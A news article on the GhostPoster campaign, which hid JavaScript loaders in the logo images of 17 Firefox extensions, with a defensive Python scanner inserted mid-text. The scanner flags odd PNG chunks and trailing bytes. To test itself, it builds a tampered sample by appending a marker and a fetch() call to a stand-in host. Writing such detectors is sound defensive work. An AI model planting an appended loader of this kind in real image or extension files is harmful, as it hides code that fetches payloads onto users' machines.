Security researchers have uncovered a troubling new malware campaign that has been hiding malicious code inside the logo images of popular Firefox browser extensions.
The campaign, dubbed “GhostPoster,” was uncovered by cybersecurity firm Koi Security, which identified 17 compromised Firefox add-ons that infected more than 50,000 users. The extensions offered features like free VPNs, weather updates, ad blockers, translation utilities, and mouse gesture tools, and appeared harmless, but they secretly ran malware in the background, monitoring users’ browsing activity and opening a backdoor inside their browsers.
Malware Hidden In Plain Sight
Instead of hiding malicious code where scanners normally look, the attackers embedded it into the extensions’ PNG logo images, a technique known as steganography. The images are displayed normally in the browser, giving users no reason to suspect anything unusual.
When the extension loaded, it quietly scanned the raw data of its own logo file, located a hidden marker, and extracted the embedded JavaScript. This code acted as a loader, fetching the main malware payload from attacker-controlled servers.
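A defender-side check for the technique described above, added here as an example and not part of Koi Security's or Mozilla's tooling: it walks the chunk structure of a PNG, flags non-standard chunk types, and reports any bytes appended after the IEND chunk, the two places where a logo can carry something other than image data. The sample images, the `<<LOADER>>` marker and the JavaScript stub are constructed for the example; the real campaign's marker is not given in the article.

```python
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG spec; anything else deserves a closer look.
KNOWN = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP", b"sBIT",
         b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs", b"sPLT", b"tIME", b"eXIf"}
# Crude hint that a run of bytes holds JavaScript rather than image data.
JS_HINT = re.compile(rb"function\s*\(|=>|\bfetch\(|\beval\(|document\.|browser\.")

def make_chunk(ctype, body):
    """Build one PNG chunk (length, type, data, CRC); used to construct samples."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def parse_chunks(data):
    """Walk the chunk list up to IEND; return (chunks, bytes found after IEND)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos, chunks = len(PNG_SIG), []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunks.append((ctype, data[pos + 8:pos + 8 + length]))
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC
        if ctype == b"IEND":
            break
    return chunks, data[pos:]

def scan_png(data):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    chunks, trailing = parse_chunks(data)
    for ctype, body in chunks:
        if ctype not in KNOWN:
            findings.append(f"non-standard chunk {ctype!r} ({len(body)} bytes)")
        if ctype != b"IDAT" and JS_HINT.search(body):
            findings.append(f"script-like text inside {ctype!r} chunk")
    if trailing:
        tag = " containing script-like text" if JS_HINT.search(trailing) else ""
        findings.append(f"{len(trailing)} bytes after IEND{tag}")
    return findings

# Constructed samples: a minimal 1x1 RGB PNG, then the same file with a marker and a JS stub appended after IEND.
IHDR = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
IDAT = zlib.compress(b"\x00\xff\xff\xff")  # filter byte + one white pixel
CLEAN_PNG = PNG_SIG + make_chunk(b"IHDR", IHDR) + make_chunk(b"IDAT", IDAT)
CLEAN_PNG += make_chunk(b"IEND", b"")
TAMPERED_PNG = CLEAN_PNG + b"<<LOADER>>(function(){fetch('https://example.invalid/p');})();"
```

Run `scan_png` over every image shipped in an extension package; a logo that yields findings is worth diffing against the version the developer published elsewhere.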
Designed To Evade Detection
GhostPoster was designed to stay hidden for as long as possible. The loader waited 48 hours before activating and downloaded the main payload only 10% of the time, a tactic meant to evade network monitoring and security analysis.
Once retrieved, the payload was heavily obfuscated and encrypted, then stored quietly inside the browser to maintain long-term persistence. Researchers say this stealthy design would allow attackers to deploy more dangerous malware in the future with little warning.
What The Malware Did
While GhostPoster did not steal passwords or redirect users to phishing pages, it still posed a serious privacy and security risk. According to Koi Security, the malware could:
- Hijack affiliate links on major shopping sites, redirecting commissions to the attackers
- Inject Google Analytics tracking into every webpage a user visits
- Remove critical browser security protections, exposing users to clickjacking and other attacks
- Bypass CAPTCHA systems used to block automated abuse
- Inject invisible iframes to carry out ad fraud and click fraud
All affected extensions communicated with the same command-and-control infrastructure, indicating a single coordinated campaign. Researchers warned that the same infrastructure could easily deliver more dangerous malware in the future.
Popular Extensions Affected
The malicious add-ons came from well-known categories:
- free-vpn-forever
- screenshot-saved-easy
- weather-best-forecast
- crxmouse-gesture
- cache-fast-site-loader
- freemp3downloader
- google-translate-right-clicks
- google-traductor-esp
- world-wide-vpn
- dark-reader-for-ff
- translator-gbbd
- i-like-weather
- google-translate-pro-extension
- ??-??
- libretv-watch-free-videos
- ad-stop
- right-click-google-translate
Mozilla’s Response
Several of the malicious extensions were still available on the Firefox Add-ons marketplace when the findings were first reported. Mozilla later confirmed that it had removed all identified extensions and strengthened its automated detection systems.
“User safety is something we’ve always prioritized and taken very seriously. Our add-ons team has investigated this report and as a result, has taken action to remove all of these extensions from AMO. We have updated our automated systems to detect and block extensions using similar attacks now and in the future. We continue to improve our systems as new attacks appear,” a Mozilla spokesperson said in a statement.
What Users Should Do
Security experts urge users to uninstall any of the affected extensions immediately and consider resetting passwords for important accounts. They also recommend being cautious with installing browser extensions — especially those offering “free” services like VPNs.
As the GhostPoster campaign shows, even a simple extension logo can be weaponized, turning everyday tools into silent surveillance mechanisms.
